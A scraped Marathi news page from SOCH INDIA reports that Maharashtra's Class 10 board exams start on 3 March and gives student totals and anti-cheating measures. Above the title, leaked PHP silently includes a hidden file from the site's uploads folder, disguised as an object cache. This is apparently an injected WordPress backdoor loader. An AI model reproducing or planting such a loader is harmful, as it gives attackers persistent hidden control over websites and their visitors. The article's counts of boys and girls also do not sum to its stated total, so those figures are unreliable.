add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); उद्यापासून दहावीच्या परीक्षेला सुरुवात – SOCH INDIA
Menu

देश
उद्यापासून दहावीच्या परीक्षेला सुरुवात

nobanner

महाराष्ट्र राज्य माध्यमिक आणि उच्च माध्यमिक शिक्षण मंडळाकडून घेण्यात येणाऱ्या इयत्ता दहावीच्या परीक्षेला उद्यापासून (३ मार्च) सुरुवात होणार आहे. राज्यभरात १७ लाख ६५हजार ८९८विद्यार्थी परीक्षा देणार आहेत, अशी माहिती मंडळाच्या अध्यक्षा शकुंतला काळे यांनी दिली आहे.

यावेळी शकुंतला काळे यांनी सांगितले की, यंदा राज्यभरातील १७ लाख ६५ हजार ८९८विद्यार्थी दहावीची परीक्षा देणार आहेत. यामध्ये ९ लाख ७५ हजार ८९४ मुलं आणि ७ लाख ८९ हजार ८९८ मुली आहेत. या परीक्षेदरम्यान कॉपीचे प्रकार होता कामा नये, यासाठी  गैर मार्गाशी लढा या उपक्रमाअंतर्गत, २७३ भरारी पथकाची नियुक्ती करण्यात आली आहे. यामध्ये नाशिक येथे ८० केंद्र संवेदनशील असल्याचे त्यांनी सांगितले. तसेच, गतवर्षाच्या तुलनेत यंदा ६५ हजार विद्यार्थ्यांमध्ये वाढ झाली असल्याचे त्यांनी सांगितले.